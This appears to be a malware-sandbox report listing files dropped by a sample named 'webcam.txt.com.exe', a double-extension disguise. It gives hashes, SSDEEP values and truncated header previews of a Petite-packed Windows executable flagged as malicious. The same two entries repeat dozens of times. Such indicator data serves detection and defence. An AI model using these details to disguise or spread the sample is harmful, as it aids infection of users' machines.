                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
